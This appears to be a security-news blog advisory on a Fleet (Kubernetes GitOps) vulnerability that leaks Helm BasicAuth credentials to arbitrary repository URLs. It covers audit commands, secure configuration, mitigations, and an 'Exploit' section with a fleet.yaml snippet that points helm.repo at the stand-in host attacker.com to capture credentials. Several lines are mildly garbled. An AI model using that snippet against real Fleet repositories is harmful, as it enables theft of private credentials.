Listen to this Post
How CVE-2026-44936 Works
Fleet is a GitOps continuous delivery tool for Kubernetes clusters. It watches Git repositories for changes and deploys Helm charts or Kubernetes manifests to downstream clusters. To fetch private Helm charts, Fleet supports authentication via a `helmSecretName` field in a `GitRepo` resource, which references a Kubernetes Secret containing BasicAuth credentials (username and password) for a private Helm repository.
The vulnerability arises when the `helmRepoURLRegex` field is not set on a `GitRepo` resource. In such a configuration, Fleet’s bundle reader forwards the configured Helm BasicAuth credentials to any URL specified in the `helm.repo` field of a `fleet.yaml` file contained in the monitored Git repository.
An attacker with `git push` access to a Fleet-monitored repository can exploit this by modifying the `fleet.yaml` file to set `helm.repo` to a malicious URL under their control (e.g., https://attacker.com/evil`). When Fleet's controller processes theGitRepo, it reads thefleet.yaml, extracts the `helm.repo` URL, and—because no `helmRepoURLRegex` is present to restrict which origins are allowed—it sends the configured BasicAuth credentials to the attacker‑specified URL.helmRepoURLRegex
The attacker's server receives the credentials (username and password) that the administrator configured to access the private Helm chart repository. This allows the attacker to capture these credentials and potentially use them to authenticate against the legitimate Helm repository or other services if the credentials are reused.
However, in versions after Fleet v0.13.3, the response body from the attacker's server is not included in the error message returned by Fleet. This prevents additional internal data (such as cluster metadata or other secrets) from being leaked through the status condition, limiting the exposure to just the credentials themselves.
The final severity of this vulnerability is not fixed—it depends entirely on the permissions associated with the leaked credentials. If the credentials grant read‑only access to a single Helm chart repository, the impact is limited. If they grant write access or are reused across multiple systems, the impact can be critical.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Fleet
Version: <0.12.15, <0.13.11, <0.14.6, <0.15.2
Vulnerability: Helm credential leakage
Severity: Depends on leaked credentials
Date: 2026-05-28
<h2 style="color: blue;">Prediction: Patched versions already released</h2>
<h2 style="color: blue;">What Undercode Say</h2>
<h2 style="color: blue;">Audit Auto‑Migrated GitRepo Resources</h2>
After upgrading to a patched version, review all `GitRepo` resources that were automatically migrated by the Helm pre‑upgrade job. The migration job adds the annotation `fleet.cattle.io/helm-regex-auto-migrated: "true"` to resources that had `helmSecretName` or `helmSecretNameForPaths` configured but lacked a.
Run the following command to list all such resources along with their auto‑derived regular expression:
kubectl get gitrepo -A -o json | \ jq -r '.items[] | select(.metadata.annotations["fleet.cattle.io/helm-regex-auto-migrated"] == "true") | "\(.metadata.namespace)/\(.metadata.name): \(.spec.helmRepoURLRegex)"'
<h2 style="color: blue;">Verify the Auto‑Derived Regex</h2>
The migration job extracts the scheme and host from the Helm repository URLs already stored in the resource's Bundles. For example, a `GitRepo` with Bundles referencinghttps://charts.example.com/stable` receives helmRepoURLRegex: "^https://charts\.example\.com/".
If the auto‑derived regular expression is broader than necessary (e.g., it matches unintended subdomains), replace it with a more specific pattern.
Example Secure Configuration
apiVersion: fleet.cattle.io/v1alpha1 kind: GitRepo metadata: name: my-app namespace: fleet-local spec: repo: https://git.example.com/org/my-app.git helmSecretName: helm-creds helmRepoURLRegex: "^https://charts\\.example\\.com/."
This ensures credentials are only forwarded to URLs matching the specified regular expression.
Check Migration Status
The migration job runs only once per installation and records its status in a ConfigMap named `fleet-helm-url-regex-migrated` in the Fleet system namespace. Inspect it with:
kubectl get configmap fleet-helm-url-regex-migrated -n fleet-system -o yaml
Exploit
- Gain Git Push Access – The attacker must have write access to a Git repository that Fleet monitors (e.g., through compromised credentials or an insider threat).
- Modify `fleet.yaml` – In the repository, edit the `fleet.yaml` file (or create one if it doesn’t exist) and set the `helm.repo` field to a malicious URL under the attacker’s control:
helm: repo: https://attacker.com/evil chart: my-chart version: 1.0.0
- Wait for Fleet Sync – Fleet’s controller periodically syncs the `GitRepo` resource. When it processes the updated
fleet.yaml, it reads the `helm.repo` URL. - Credential Exfiltration – Because no `helmRepoURLRegex` is set on the
GitRepo, Fleet forwards the BasicAuth credentials (from the Secret referenced byhelmSecretName) to the attacker’s URL (`https://attacker.com/evil`). - Capture Credentials – The attacker’s server receives the HTTP request containing the `Authorization: Basic
` header, decodes it, and obtains the plaintext username and password. - Lateral Movement – The attacker can now use the captured credentials to authenticate against the legitimate Helm repository (or any other service where the credentials are reused), potentially accessing or modifying private Helm charts.
Protection
– Upgrade to a Patched Version – The most effective mitigation is to upgrade Fleet to one of the patched releases: v0.15.2, v0.14.6, v0.13.11, or v0.12.15. These versions require `helmRepoURLRegex` to be explicitly set before any credentials are forwarded.
– Set `helmRepoURLRegex` Manually – If you cannot upgrade immediately, manually add the `helmRepoURLRegex` field to all `GitRepo` resources that use `helmSecretName` or helmSecretNameForPaths. Ensure the regular expression matches only your legitimate Helm repository origin(s).
– Audit Existing Resources – After upgrading, run the `kubectl` command provided in the “What Undercode Say” section to identify all auto‑migrated resources. Verify that each auto‑derived regex is sufficiently restrictive.
– Rotate Compromised Credentials – If you suspect that credentials may have been leaked (e.g., you cannot rule out prior exploitation), immediately rotate the affected Helm repository credentials and any other credentials that may have been reused.
– Monitor Fleet Logs – Check Fleet controller logs for unexpected outbound requests to unknown URLs, which could indicate attempted exploitation.
Impact
- Credential Theft – An attacker with `git push` access can capture the BasicAuth credentials (username and password) configured for accessing private Helm chart repositories.
- Scope Depends on Permissions – The actual impact is not fixed; it scales with the permissions of the leaked credentials. If the credentials grant read‑only access to a single repository, the damage is limited. If they grant write access or are reused across multiple systems (e.g., for container registries, CI/CD pipelines, or cloud APIs), the attacker can escalate privileges, modify charts, inject malicious code, or pivot to other environments.
- Data Exfiltration – While the response body from the attacker’s server is not included in error messages (fixed in v0.13.3 and later), the credentials themselves are still transmitted in plaintext (over HTTPS) to the attacker’s endpoint, enabling exfiltration.
- Supply Chain Risk – Compromised Helm chart credentials can lead to the injection of malicious charts into private repositories, affecting all downstream clusters that consume those charts.
- Compliance and Audit – Organizations subject to regulations (e.g., GDPR, HIPAA) may face compliance violations if credentials are leaked, especially if they grant access to sensitive data or production environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

